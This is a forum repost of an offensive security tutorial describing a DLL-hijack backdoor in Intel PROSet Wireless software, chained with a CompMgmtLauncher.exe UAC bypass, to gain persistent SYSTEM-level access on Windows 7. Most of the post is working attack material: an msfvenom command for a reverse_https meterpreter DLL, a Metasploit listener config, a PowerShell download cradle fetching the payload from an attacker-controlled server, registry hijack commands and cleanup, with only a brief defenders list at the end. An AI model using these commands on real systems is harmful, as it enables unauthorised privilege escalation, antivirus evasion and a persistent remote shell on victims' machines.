Jump to content
Nytro

SYSTEM-level Persistence via Intel PROSet Wireless RpcRtRemote.dll Backdoor

By Nytro, in Tutoriale in engleza

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

SYSTEM-level Persistence via Intel PROSet Wireless RpcRtRemote.dll Backdoor

Posted on March 17, 2017 by x4zx
 

** update 4/14/2017: powershell exploit code: https://github.com/0rbz/Intel_Inside

The Intel PROSet Wireless connection management software is vulnerable to DLL hijack which results in privilege escalation, and SYSTEM level persistence via a backdoored “RpcRtRemote.dll” file. To execute this particular attack, we’ll chain it together with a CompMgmtLauncher.exe UAC Bypass (similar to enigma0x3’s and others’ work) to gain elevated permissions in order to write our backdoored file into the required location at “C:\Program Files\Common Files\Intel\WirelessCommon\”

The issue arises when “C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe” (a system level service) calls “RpcRtRemote.dll” within the same directory, which doesn’t exist on a default installation of the package. This allows us to supply our own backdoored dll, which we’ll execute manually for system-level privileges, but it also will give us system-level reverse_https meterpreter persistence at every system boot up since RegSrvc.exe runs as a local system service at boot time.

This was tested on a fully patched 64-bit Windows 7 machine with the 64-bit version of the PROSet Wireless Package (“Wireless_19.40.0_PROSet64_Win7.exe”), and we’ll use 64-bit reverse_https meterpreter dll payload. This also probably works with x86, but the 64-bit dll offers us a bit more “evasion” when it comes to antivirus detection capabilities. This specific attack vector is also handy in regards to having a somewhat discreet sidechannel out of a target network.

This also assumes you already have a reverse https meterpreter shell on a box as user in the local administrators group, with UAC enabled to anything but “Always Notify”, and just need another method to “getsystem” on your target.

A vulnerable host should have the “RegSrvc.exe” process running, so check it with something like: 

tasklist |find "RegSrvc.exe"

The resource file settings i’m using for for the listener is something like:

intel.rc: 

use exploit/multi/handler
set ExitOnSession false
set LHOST 0.0.0.0
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_https
set HandlerSSLCert custom.pem
exploit -j

The first step is to create your 64-bit backdoored RpcRtRemote.dll file: 


msfvenom -p windows/x64/meterpreter/reverse_https -f dll LHOST=192.168.13.26 LPORT=5555 > RpcRtRemote.dll

Host the above DLL on a web server you control. We'll use powershell to bring it down to the target directory later.

Create the following powershell script, and also host it on a web server you control. Point the "$pl_url" variable to your backdoored RpcRtRemote.dll file:

RpcRtRemote_downloader.ps1: 


$dlx = New-Object System.Net.WebClient
$pl_url = 'https://x42.obscurechannel.com/RpcRtRemote.dll';
$lfile = 'C:\Program Files\Common Files\Intel\WirelessCommon\RpcRtRemote.dll';
$dlx.DownloadFile($pl_url,$lfile);

Let's test.

From your UAC restricted admin shell, execute the following: (this could all be scripted into a powershell or metasploit module!)

This executes a CompMgmtLauncher.exe UAC bypass via wmic (because it works) and downloads our backdoored RpcRtRemote.dll (64 bit reverse_https meterpreter payload) and copies it to the WirelessCommon Directory using a powershell download cradle: 


reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -windowstyle hidden -nop iex -Command (New-Object Net.WebClient).DownloadString('https://yourserver.com/RpcRtRemote_downloader.ps1')" /f

  

wmic process call create "cmd.exe /c C:\windows\system32\CompMgmtLauncher.exe"

Wait before running the next step, the dll download may take a few seconds depending on its size, bandwidth, etc.

Re-execute the UAC bypass to re-launch "RegSrvc.exe" as an elevated process: 


reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe" /f
wmic process call create "cmd.exe /c C:\windows\system32\CompMgmtLauncher.exe"

clean up: 


reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

At this point, you should have gotten a new elevated meterpreter session and should be able to execute a "getsystem" command. This will also persist as a NT AUTHORITY/SYSTEM level shell upon every reboot.

The flow:

intel-UAC-1.png

intel-UAC-2.png

Defenders:

  1. Configure UAC to "Always Notify"
  2. Remove users from the local administrators group
  3. Monitor for rogue connections originating from rundll32.exe (only effective if the attacker doesn't migrate to another valid process)

- @0rbz_

 

Sursa: https://www.obscurechannel.com/x42/?p=378

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...